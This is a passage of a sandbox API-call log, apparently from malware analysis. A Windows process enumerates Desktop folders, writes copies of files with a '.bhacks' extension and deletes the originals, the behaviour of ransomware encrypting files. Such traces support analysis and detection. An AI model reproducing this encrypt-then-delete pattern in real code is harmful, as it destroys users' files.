ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf320 [0064.483] FindNextFileW (in: hFindFile=0x9bf320, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.483] FindNextFileW (in: hFindFile=0x9bf320, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0064.483] FindNextFileW (in: hFindFile=0x9bf320, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0064.484] FindNextFileW (in: hFindFile=0x9bf320, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0064.484] FindNextFileW (in: hFindFile=0x9bf320, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0064.484] FindNextFileW (in: hFindFile=0x9bf320, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0064.484] FindNextFileW (in: hFindFile=0x9bf320, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0064.484] FindNextFileW (in: hFindFile=0x9bf320, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0064.484] FindClose (in: hFindFile=0x9bf320 | out: hFindFile=0x9bf320) returned 1 [0064.485] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.jpg", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0064.485] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf020 [0064.485] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.485] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0064.485] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fd8190, ftCreationTime.dwHighDateTime=0x1d5d3dd, ftLastAccessTime.dwLowDateTime=0x25c817f0, ftLastAccessTime.dwHighDateTime=0x1d5ce55, ftLastWriteTime.dwLowDateTime=0x25c817f0, ftLastWriteTime.dwHighDateTime=0x1d5ce55, nFileSizeHigh=0x0, nFileSizeLow=0xb4eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx", cAlternateFileName="E2JRFW~1.XLS")) returned 1 [0064.485] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0064.486] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0064.486] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 1 [0064.486] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 [0064.486] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0064.486] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0064.486] FindClose (in: hFindFile=0x9bf020 | out: hFindFile=0x9bf020) returned 1 [0064.486] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.jpg", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0064.487] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf140 [0064.487] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.487] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0064.487] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0064.487] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbde6efb0, ftCreationTime.dwHighDateTime=0x1d5ca5f, ftLastAccessTime.dwLowDateTime=0x662319e0, ftLastAccessTime.dwHighDateTime=0x1d5cf99, ftLastWriteTime.dwLowDateTime=0x662319e0, ftLastWriteTime.dwHighDateTime=0x1d5cf99, nFileSizeHigh=0x0, nFileSizeLow=0x16745, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png", cAlternateFileName="DN0HVZ~1.PNG")) returned 1 [0064.488] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0064.488] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1afa9ca0, ftCreationTime.dwHighDateTime=0x1d5d768, ftLastAccessTime.dwLowDateTime=0x9e894010, ftLastAccessTime.dwHighDateTime=0x1d5d5cb, ftLastWriteTime.dwLowDateTime=0x9e894010, ftLastWriteTime.dwHighDateTime=0x1d5d5cb, nFileSizeHigh=0x0, nFileSizeLow=0xa84f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png", cAlternateFileName="")) returned 1 [0064.488] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0064.488] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x0, dwReserved1=0x0, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0064.488] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0064.488] FindNextFileW (in: hFindFile=0x9bf140, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0064.488] FindClose (in: hFindFile=0x9bf140 | out: hFindFile=0x9bf140) returned 1 [0064.489] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.jpg", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0064.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0064.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0064.631] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", lpFilePart=0x0) returned 0x37 [0064.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0064.631] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\w3nckpmzd6_t8ygd3crn.jpg.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0064.632] GetFileType (hFile=0x324) returned 0x1 [0064.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0064.632] GetFileType (hFile=0x324) returned 0x1 [0064.666] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg", nBufferLength=0x105, lpBuffer=0x6fe4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg", lpFilePart=0x0) returned 0x30 [0064.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0064.667] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\w3nckpmzd6_t8ygd3crn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0064.667] GetFileType (hFile=0x33c) returned 0x1 [0064.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0064.667] GetFileType (hFile=0x33c) returned 0x1 [0064.667] ReadFile (in: hFile=0x33c, lpBuffer=0x2598270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2598270*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.667] ReadFile (in: hFile=0x33c, lpBuffer=0x2598270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2598270*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.667] WriteFile (in: hFile=0x324, lpBuffer=0x2599488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2599488*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.669] ReadFile (in: hFile=0x33c, lpBuffer=0x2598270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2598270*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0064.669] WriteFile (in: hFile=0x324, lpBuffer=0x2599488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2599488*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.669] ReadFile (in: hFile=0x33c, lpBuffer=0x2598270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2598270*, lpNumberOfBytesRead=0x6feb68*=0x443, lpOverlapped=0x0) returned 1 [0064.669] WriteFile (in: hFile=0x324, lpBuffer=0x2599488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x2599488*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0064.669] ReadFile (in: hFile=0x33c, lpBuffer=0x2598270, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x2598270*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0064.669] CloseHandle (hObject=0x33c) returned 1 [0064.670] WriteFile (in: hFile=0x324, lpBuffer=0x2599488*, nNumberOfBytesToWrite=0x450, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x2599488*, lpNumberOfBytesWritten=0x6fea68*=0x450, lpOverlapped=0x0) returned 1 [0064.670] CloseHandle (hObject=0x324) returned 1 [0064.671] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg", lpFilePart=0x0) returned 0x30 [0064.671] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\W3nCKPmZd6_T8yGD3CRn.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\w3nckpmzd6_t8ygd3crn.jpg")) returned 1 [0064.716] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0064.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0064.716] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0064.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0064.716] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0064.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0064.716] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0064.716] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.png", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, 